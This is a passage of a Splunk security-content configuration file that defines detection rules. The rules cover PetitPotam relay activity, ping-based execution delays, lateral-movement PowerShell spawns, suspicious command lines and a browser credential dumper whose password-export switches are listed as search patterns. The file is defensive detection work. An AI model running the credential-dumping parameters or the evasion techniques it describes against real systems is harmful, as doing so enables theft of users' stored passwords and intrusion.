description = The following analytic utilizes Windows Event Code 5145, "A network share object was checked to see whether client can be granted desired access". During our research into PetitPotam, CVE-2021-36942, we identified the occurrence of this event on the target host with specific values. \ To enable 5145 events via Group Policy - Computer Configuration->Policies->Windows Settings->Security Settings->Advanced Audit Policy Configuration. Expand this node, go to Object Access (Audit Policies->Object Access), then select the setting Audit Detailed File Share. \ It is possible this is not enabled by default and may need to be reviewed and enabled. \ During triage, review parallel security events to identify further suspicious activity.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1187"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes Windows Event Code 5145, "A network share object was checked to see whether client can be granted desired access". During our research into PetitPotam, CVE-2021-36942, we identified the occurrence of this event on the target host with specific values. \ To enable 5145 events via Group Policy - Computer Configuration->Policies->Windows Settings->Security Settings->Advanced Audit Policy Configuration. Expand this node, go to Object Access (Audit Policies->Object Access), then select the setting Audit Detailed File Share. \ It is possible this is not enabled by default and may need to be reviewed and enabled. \ During triage, review parallel security events to identify further suspicious activity.
action.escu.how_to_implement = Windows Event Code 5145 is required to utilize this analytic and it may not be enabled in most environments.
action.escu.known_false_positives = False positives have been limited when the Anonymous Logon is used for Account Name.
action.escu.creation_date = 2021-08-31
action.escu.modification_date = 2021-08-31
action.escu.confidence = high
action.escu.full_search_name = ESCU - PetitPotam Network Share Access Request - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["PetitPotam NTLM Relay on Active Directory Certificate Services"]
action.risk = 1
action.risk.param._risk_message = A remote host is enumerating $dest$ to identify permissions. This is a precursor event to CVE-2021-36942, PetitPotam.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - PetitPotam Network Share Access Request - Rule
action.correlationsearch.annotations = {"analytic_story": ["PetitPotam NTLM Relay on Active Directory Certificate Services"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2021-36942"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1187"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes Windows Event Code 5145, "A network share object was checked to see whether client can be granted desired access". During our research into PetitPotam, CVE-2021-36942, we identified the occurrence of this event on the target host with specific values. \ To enable 5145 events via Group Policy - Computer Configuration->Policies->Windows Settings->Security Settings->Advanced Audit Policy Configuration. Expand this node, go to Object Access (Audit Policies->Object Access), then select the setting Audit Detailed File Share. \ It is possible this is not enabled by default and may need to be reviewed and enabled. \ During triage, review parallel security events to identify further suspicious activity.
action.notable.param.rule_title = PetitPotam Network Share Access Request
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` Account_Name="ANONYMOUS LOGON" EventCode=5145 Relative_Target_Name=lsarpc | stats count min(_time) as firstTime max(_time) as lastTime by dest, Security_ID, Share_Name, Source_Address, Accesses, Message | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `petitpotam_network_share_access_request_filter`

[ESCU - PetitPotam Suspicious Kerberos TGT Request - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies Event Code 4768, `A Kerberos authentication ticket (TGT) was requested`, occurring successfully. This behavior has been identified to assist with detecting PetitPotam, CVE-2021-36942. Once an attacker obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request will generate a 4768 event with some unusual fields depending on the environment. This analytic will require tuning; we recommend filtering Account_Name to Domain Controllers for your environment.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies Event Code 4768, `A Kerberos authentication ticket (TGT) was requested`, occurring successfully. This behavior has been identified to assist with detecting PetitPotam, CVE-2021-36942.
Once an attacker obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request will generate a 4768 event with some unusual fields depending on the environment. This analytic will require tuning; we recommend filtering Account_Name to Domain Controllers for your environment.
action.escu.how_to_implement = The following analytic requires Event Code 4768. Ensure that it is logging on Domain Controllers and appearing in Splunk.
action.escu.known_false_positives = False positives are possible if the environment is using certificates for authentication.
action.escu.creation_date = 2021-08-31
action.escu.modification_date = 2021-08-31
action.escu.confidence = high
action.escu.full_search_name = ESCU - PetitPotam Suspicious Kerberos TGT Request - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["PetitPotam NTLM Relay on Active Directory Certificate Services", "Active Directory Kerberos Attacks"]
action.risk = 1
action.risk.param._risk_message = A Kerberos TGT was requested in a non-standard manner against $dest$, potentially related to CVE-2021-36942, PetitPotam.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - PetitPotam Suspicious Kerberos TGT Request - Rule
action.correlationsearch.annotations = {"analytic_story": ["PetitPotam NTLM Relay on Active Directory Certificate Services", "Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2021-36942"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies Event Code 4768, `A Kerberos authentication ticket (TGT) was requested`, occurring successfully. This behavior has been identified to assist with detecting PetitPotam, CVE-2021-36942. Once an attacker obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request will generate a 4768 event with some unusual fields depending on the environment. This analytic will require tuning; we recommend filtering Account_Name to Domain Controllers for your environment.
action.notable.param.rule_title = PetitPotam Suspicious Kerberos TGT Request
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4768 Client_Address!="::1" Certificate_Thumbprint!="" Account_Name=*$ | stats count min(_time) as firstTime max(_time) as lastTime by dest, Account_Name, Client_Address, action, Message | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `petitpotam_suspicious_kerberos_tgt_request_filter`

[ESCU - Ping Sleep Batch Command - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic will identify the possible execution of ping sleep batch commands. This technique was seen in several malware samples and is used to trigger sleep times without explicitly calling sleep functions or cmdlets. The goal is to delay the execution of malicious code and bypass detection or sandbox analysis. This detection can be a good indicator of a process delaying its execution for malicious purposes.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1497", "T1497.003"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic will identify the possible execution of ping sleep batch commands. This technique was seen in several malware samples and is used to trigger sleep times without explicitly calling sleep functions or cmdlets. The goal is to delay the execution of malicious code and bypass detection or sandbox analysis. This detection can be a good indicator of a process delaying its execution for malicious purposes.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents.
These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or network operators may execute this command. Please update the filter macros to remove false positives.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Ping Sleep Batch Command - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Data Destruction", "WhisperGate", "BlackByte Ransomware", "Warzone RAT"]
action.risk = 1
action.risk.param._risk_message = Suspicious $process$ command line run on $dest$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Ping Sleep Batch Command - Rule
action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "WhisperGate", "BlackByte Ransomware", "Warzone RAT"],
"cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1497", "T1497.003"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_ping` (Processes.parent_process = "*ping*" Processes.parent_process = *-n* Processes.parent_process="* Nul*" Processes.parent_process="*>*") OR (Processes.process = "*ping*" Processes.process = *-n* Processes.process="* Nul*" Processes.process="*>*") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ping_sleep_batch_command_filter`

[ESCU - Possible Browser Pass View Parameter - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic will detect if a suspicious process contains a command-line parameter related to a web browser credential dumper. This technique is used by Remcos RAT malware, which uses the Nirsoft webbrowserpassview.exe application to dump web browser credentials. Remcos uses the "/stext" command line to dump the credentials in text format. This hunting query is a good indicator of hosts suffering from a possible Remcos RAT infection. Since the hunting query is based on the command parameter and the possible path where it will save the text credential information, it may catch normal tools that use the same command and behavior.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555.003", "T1555"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic will detect if a suspicious process contains a command-line parameter related to a web browser credential dumper. This technique is used by Remcos RAT malware, which uses the Nirsoft webbrowserpassview.exe application to dump web browser credentials. Remcos uses the "/stext" command line to dump the credentials in text format. This hunting query is a good indicator of hosts suffering from a possible Remcos RAT infection. Since the hunting query is based on the command parameter and the possible path where it will save the text credential information, it may catch normal tools that use the same command and behavior.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives are quite limited.
Filter is needed.
action.escu.creation_date = 2021-11-22
action.escu.modification_date = 2021-11-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - Possible Browser Pass View Parameter - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Remcos"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Possible Browser Pass View Parameter - Rule
action.correlationsearch.annotations = {"analytic_story": ["Remcos"], "cis20": ["CIS 10"], "confidence": 40, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555.003", "T1555"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*/stext *", "*/shtml *", "*/LoadPasswordsIE*", "*/LoadPasswordsFirefox*", "*/LoadPasswordsChrome*", "*/LoadPasswordsOpera*", "*/LoadPasswordsSafari*", "*/UseOperaPasswordFile*", "*/OperaPasswordFile*", "*/stab*", "*/scomma*", "*/stabular*", "*/shtml*", "*/sverhtml*", "*/sxml*", "*/skeepass*") AND Processes.process IN ("*\\temp\\*", "*\\users\\public\\*", "*\\programdata\\*") by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` |
`security_content_ctime(lastTime)` | `possible_browser_pass_view_parameter_filter`

[ESCU - Possible Lateral Movement PowerShell Spawn - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic is designed to identify possible lateral movement attacks that involve the spawning of a PowerShell process as a child or grandchild process of commonly abused processes. These processes include services.exe, wmiprvse.exe, svchost.exe, wsmprovhost.exe, and mmc.exe.\ Such behavior is indicative of legitimate Windows features such as the Service Control Manager, Windows Management Instrumentation, Task Scheduler, Windows Remote Management, and the DCOM protocol being abused to start a process on a remote endpoint. This behavior is often seen during lateral movement techniques where adversaries or red teams abuse these services for lateral movement and remote code execution.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.003", "T1021.006", "T1047", "T1053.005", "T1543.003", "T1059.001", "T1218.014"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic is designed to identify possible lateral movement attacks that involve the spawning of a PowerShell process as a child or grandchild process of commonly abused processes. These processes include services.exe, wmiprvse.exe, svchost.exe, wsmprovhost.exe, and mmc.exe.\ Such behavior is indicative of legitimate Windows features such as the Service Control Manager, Windows Management Instrumentation, Task Scheduler, Windows Remote Management, and the DCOM protocol being abused to start a process on a remote endpoint. This behavior is often seen during lateral movement techniques where adversaries or red teams abuse these services for lateral movement and remote code execution.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Legitimate applications may spawn PowerShell as a child process of the identified processes. Filter as needed.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Possible Lateral Movement PowerShell Spawn - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Lateral Movement", "Malicious PowerShell", "Hermetic Wiper", "Data Destruction", "Scheduled Tasks"]
action.risk = 1
action.risk.param._risk_message = A PowerShell process was spawned as a child process of typically abused processes on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Possible Lateral
Movement PowerShell Spawn - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Malicious PowerShell", "Hermetic Wiper", "Data Destruction", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.003", "T1021.006", "T1047", "T1053.005", "T1543.003", "T1059.001", "T1218.014"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic is designed to identify possible lateral movement attacks that involve the spawning of a PowerShell process as a child or grandchild process of commonly abused processes. These processes include services.exe, wmiprsve.exe, svchost.exe, wsmprovhost.exe, and mmc.exe.\ Such behavior is indicative of legitimate Windows features such as the Service Control Manager, Windows Management Instrumentation, Task Scheduler, Windows Remote Management, and the DCOM protocol being abused to start a process on a remote endpoint. This behavior is often seen during lateral movement techniques where adversaries or red teams abuse these services for lateral movement and remote code execution. 
action.notable.param.rule_title = Possible Lateral Movement PowerShell Spawn action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=wmiprvse.exe OR Processes.parent_process_name=services.exe OR Processes.parent_process_name=svchost.exe OR Processes.parent_process_name=wsmprovhost.exe OR Processes.parent_process_name=mmc.exe) (Processes.process_name=powershell.exe OR (Processes.process_name=cmd.exe AND Processes.process=*powershell.exe*) OR Processes.process_name=pwsh.exe OR (Processes.process_name=cmd.exe AND Processes.process=*pwsh.exe*)) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `possible_lateral_movement_powershell_spawn_filter` [ESCU - Potential password in username - Rule] action.escu = 0 action.escu.enabled = 1 description = This search identifies users who have entered their passwords in username fields. This is done by looking for failed authentication attempts using usernames with a length longer than 7 characters and a high Shannon entropy, and looks for the next successful authentication attempt from the same source system to the same destination system as the failed attempt. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.003", "T1552.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This search identifies users who have entered their passwords in username fields. This is done by looking for failed authentication attempts using usernames with a length longer than 7 characters and a high Shannon entropy, and looks for the next successful authentication attempt from the same source system to the same destination system as the failed attempt. action.escu.how_to_implement = To successfully implement this search, you need to have relevant authentication logs mapped to the Authentication data model. You also need to have the Splunk TA URL Toolbox (https://splunkbase.splunk.com/app/2734/) installed. The detection must run with a time interval shorter than endtime+1000. action.escu.known_false_positives = Valid usernames with high entropy or source/destination system pairs with multiple authenticating users will make it difficult to identify the real user authenticating. 
action.escu.creation_date = 2022-05-11 action.escu.modification_date = 2022-05-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Potential password in username - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Credential Dumping", "Insider Threat"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Potential password in username - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Insider Threat"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.003", "T1552.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` earliest(_time) AS starttime latest(_time) AS endtime latest(sourcetype) AS sourcetype values(Authentication.src) AS src values(Authentication.dest) AS dest count FROM datamodel=Authentication WHERE nodename=Authentication.Failed_Authentication BY "Authentication.user" | `drop_dm_object_name(Authentication)` | lookup ut_shannon_lookup word AS user | where ut_shannon>3 AND len(user)>=8 AND mvcount(src) == 1 | sort count, - ut_shannon | eval incorrect_cred=user | eval endtime=endtime+1000 | map maxsearches=70 search="| tstats `security_content_summariesonly` earliest(_time) AS starttime latest(_time) AS endtime latest(sourcetype) AS sourcetype values(Authentication.src) AS src values(Authentication.dest) AS dest count FROM datamodel=Authentication WHERE nodename=Authentication.Successful_Authentication 
Authentication.src=\"$src$\" Authentication.dest=\"$dest$\" sourcetype IN (\"$sourcetype$\") earliest=\"$starttime$\" latest=\"$endtime$\" BY \"Authentication.user\" | `drop_dm_object_name(\"Authentication\")` | `potential_password_in_username_false_positive_reduction` | eval incorrect_cred=\"$incorrect_cred$\" | eval ut_shannon=\"$ut_shannon$\" | sort count" | where user!=incorrect_cred | outlier action=RM count | `potential_password_in_username_filter` [ESCU - Potentially malicious code on commandline - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic uses a pretrained machine learning text classifier to detect potentially malicious commandlines. The model identifies unusual combinations of keywords found in samples of commandlines where adversaries executed powershell code, primarily for C2 communication. For example, adversaries will leverage IO capabilities such as "streamreader" and "webclient", threading capabilties such as "mutex" locks, programmatic constructs like "function" and "catch", and cryptographic operations like "computehash". Although observing one of these keywords in a commandline script is possible, combinations of keywords observed in attack data are not typically found in normal usage of the commandline. The model will output a score where all values above zero are suspicious, anything greater than one particularly so. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic uses a pretrained machine learning text classifier to detect potentially malicious commandlines. The model identifies unusual combinations of keywords found in samples of commandlines where adversaries executed powershell code, primarily for C2 communication. 
For example, adversaries will leverage IO capabilities such as "streamreader" and "webclient", threading capabilties such as "mutex" locks, programmatic constructs like "function" and "catch", and cryptographic operations like "computehash". Although observing one of these keywords in a commandline script is possible, combinations of keywords observed in attack data are not typically found in normal usage of the commandline. The model will output a score where all values above zero are suspicious, anything greater than one particularly so. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This model is an anomaly detector that identifies usage of APIs and scripting constructs that are correllated with malicious activity. These APIs and scripting constructs are part of the programming langauge and advanced scripts may generate false positives. 
action.escu.creation_date = 2022-01-14 action.escu.modification_date = 2022-01-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Potentially malicious code on commandline - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Command-Line Executions"] action.risk = 1 action.risk.param._risk_message = Unusual command-line execution with hallmarks of malicious activity run by $user$ found on $dest$ with commandline $process$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 12}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 12}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Potentially malicious code on commandline - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Command-Line Executions"], "cis20": ["CIS 10"], "confidence": 20, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel="Endpoint.Processes" by Processes.parent_process_name Processes.process_name Processes.process Processes.user Processes.dest | `drop_dm_object_name(Processes)` | where len(process) > 200 | `potentially_malicious_code_on_cmdline_tokenize_score` | apply 
unusual_commandline_detection | eval score='predicted(unusual_cmdline_logits)', process=orig_process | fields - unusual_cmdline* predicted(unusual_cmdline_logits) orig_process | where score > 0.5 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `potentially_malicious_code_on_commandline_filter` [ESCU - PowerShell 4104 Hunting - Rule] action.escu = 0 action.escu.enabled = 1 description = The following Hunting analytic assists with identifying suspicious PowerShell execution using Script Block Logging, or EventCode 4104. This analytic is not meant to be ran hourly, but occasionally to identify malicious or suspicious PowerShell. This analytic is a combination of work completed by Alex Teixeira and Splunk Threat Research Team. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following Hunting analytic assists with identifying suspicious PowerShell execution using Script Block Logging, or EventCode 4104. This analytic is not meant to be ran hourly, but occasionally to identify malicious or suspicious PowerShell. This analytic is a combination of work completed by Alex Teixeira and Splunk Threat Research Team. action.escu.how_to_implement = The following Hunting analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = Limited false positives. May filter as needed. 
action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell 4104 Hunting - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "Rhysida Ransomware", "DarkGate Malware", "Flax Typhoon", "CISA AA23-347A", "Data Destruction"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell 4104 Hunting - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "Rhysida Ransomware", "DarkGate Malware", "Flax Typhoon", "CISA AA23-347A", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 | eval DoIt = if(match(ScriptBlockText,"(?i)(\$doit)"), "4", 0) | eval enccom=if(match(ScriptBlockText,"[A-Za-z0-9+\/]{44,}([A-Za-z0-9+\/]{4}|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{2}==)") OR match(ScriptBlockText, "(?i)[-]e(nc*o*d*e*d*c*o*m*m*a*n*d*)*\s+[^-]"),4,0) | eval suspcmdlet=if(match(ScriptBlockText, 
